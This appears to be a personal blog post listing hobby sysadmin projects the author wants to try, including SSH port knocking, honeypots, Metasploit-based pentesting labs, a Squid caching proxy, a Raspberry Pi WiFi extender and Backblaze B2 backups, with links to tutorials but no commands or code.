I want to learn new (syadmin-ish) thing if I have some free time because it is fun. I am not good enough at programming and the amount of logic required, but I do fine solace in running and maintaining server systems. Here I have a list of things I would like to try in the future.
Other than using a non-standard port for
ssh (i.e. other than port
22), there is another way to hide your SSH port. This is a good strategy because even though you are running on an non-standard port for
ssh, there is no guarantee you will be totally safe since the attacker can just
nmap you. That is why it is crucial to disable password-based authentication for
ssh. Rapid7 has a nice tutorial on implementing port-knocking strategy with
Feeling good at securing server with bunch of good packages (e.g.
rkhunter, etc), what about fooling some pentesters? At some point, I would like to spin up a dummy server with the intention to learn what a script kiddie would do upon entering a server with a malicious intention. There is a well-known package for running an
ssh honeypot known as kippo, with tutorials here and here. A simpler setup would be running a plain Docker container with its port 22 being mapped to host's port 22, as detailed here by Dan Sosedoff.
For a fancier honeypot setup, there is a project on GitHub that goes by the name Modern Honey Network (MHN) that allows you to run multiple honeypot packages with a single installation (that is pretty awesome). Here is a short write-up on Medium by David Greenwood to demonstrate the capability of MHN.
Update. It seems like Kippo's development has stopped. Here's a newer (?) alternative, cowrie.
When I first bumped into the article detailing the use of Sysdig to fish for hackers, I was like "wow it is not that hard to figure this shit out". Probably when I have tons of free time to experiment with this, I would also run a poorly configured server with the mission to learn what would happen if a script kiddie got into my server. Here is another article detailing the use of Sysdig with Falco by MWR Infosec.
Pentesting is an abbreviation for "penetration testing", where an individual performs attack on web services to in order to gain access. There are a lot of tools for this, most popular among them being the Metaploit (open source, available on GitHub). There is a project that is based on Metasploit, known as Autosploit.py. However, according to Rapid7, the current form of Autosploit.py could land a user "in CFAA hot water" because it indiscrimates its target by querying hosts against Shodan API. Another tool that could be use is Armitage, which comes with a GUI and is also based on Metasploit. Maybe I should set up an instance that has known vulnerabilities and try to gain access into it. Btw, there's the online manual for Metasploit.
Here's BitWarden, an open source alternative to commercial password storage & syncing solutions like LastPass & 1Password. I've been using 1Password for about 2 years now (as of writing this, Feb 2018). The software engineer who maintains the code did an AMA on r/IAmA. Good thing is that BitWarden comes with Docker Compose script for in-house deployment, but it requires 2GB memory. As of now, the RasPi can't take this, but Pine64 should be able to do it.
Local Squid Proxy
Say that, I have enough money & time to set up a local RasPi cluster, I would like to have a local Pi-hole server & and local Squid proxy. If I can cache some stuff locally, that'd be awesome. I read about Squid in the past where terminating/intercepting SSL/HTTPS connection would make it a MITM. Here are some readings:
- Setting up Explicit Squid Proxy on Alpine Linux wiki.
- Intercepting HTTPS Traffic by Stephen C. Phillips.
- MITM Proxy, an open source application.
- Squid 3.1 Caching Proxy with SSL by Jim Araujo.
Rationale for doing this: local cache to speed up certain connections (think like the YouTube videos I keep on playing). Probably I should get an actual mini server with x86 processor instead of using an Arm. But that would probably cost quite a bit more money. And RAM doesn't come cheap these days.
I think there are some good reasons to start learning some basic animation. Knowledge in Blender would give me an edge to some 3D modeling, that way I can 3D-print some lab stuff (e.g. magnetic rack for 1.5 ml tubes). Knowledge in Synfig Studio for the luls, and knowledge in Godot Engine is just for fun. But first and foremost, I should pick up a programming language beforehand, preferably with R/Python because these 2 are directly applicable to my field.
Pi 3 WiFi Extender
I was thinking about this project after I saw this article on CloudFlare: Privacy-Protecting Portable Router, which mentions the use of GL.iNet GL-AR750 as WiFi Extender/Repeater.
The basic of a WiFi extender is that it must have 2 NICs. The GL-AR750 is great because it operates on 802.11ac protocol, which supports 5 GHz band (faster than 2.4 GHz). There is a knowledge gap as I do not understand what WISP mode is. Maybe the right question is that for this to work well, a device must have 2 wireless NICs. I do not know how many wireless NICs this GL-AR-750 has.
Update. Okay after a quick googling, WISP mode allows an adapter to act as a WiFi client to an upstream access point while at the same time it can act as an access point for downstream clients. One adapter to do both instead of having 2 separate dedicated NICs.
Maybe I should get a small travel router with WISP mode for... well... traveling. For better security and isolation when connecting to public hotspot, that is.
Update. Here is an interesting project: IOT WiFi, Raspberry Pi AP + Client. With this, I just need to run a Pi 3 with Docker container, pull the Docker image (Alpine, really small), run it in priviledged mode, and this Docker container will now manage the
wpa_supplicant so that this Pi 3 can act as a client and also as an access point. Perfect!
Update: However, be fully aware of the hardware/technical limitations of using RasPi3 B+ as a WiFi extender. First, WiFi extender itself is a bad idea. By having an extender sitting in between router (to the internet) and desktop (the client), effectively it makes the traffic busier, from 2 hops PC <--> router to 4 hops PC <--> extender <--> router.
This discussion tends to get a little bit confusing. "Having a repeater halves the local bandwidth and it will only impact internet speed if the halved local throughput is less than the internet speed". The way I understand this is that if the wireless extender runs at 166 MBytes/sec (WiFi 802.11ac standard), the effective speed is 83 MBytes/sec, which is faster than a typical 100 Mbits/sec internet speed. This is briefly explained here.
Btw, archlinux wiki has a great page on software access point. Probably a good resource.
Local Storage to B2
I am getting a homebrew NAS soon. In accordance to the probability of shit to occur is approaching 1, I would like to have a backup system in place. I would like to try BackBlaze B2.
Briefly talking about the setup, I would go with Pine64's ROCK64 board since it could reach the theoretical limit of 100 MB/sec transfer speed on SSD, while a Pi 3 could only reach 10.3 MB/sec transfer speed.
As for the backup, B2 looks like can handle it. Here is a tutorial by BackBlaze to backup data to B2 with Restic. Very likely I will stick with Restic, but I would also like to see if RClone can do a better job.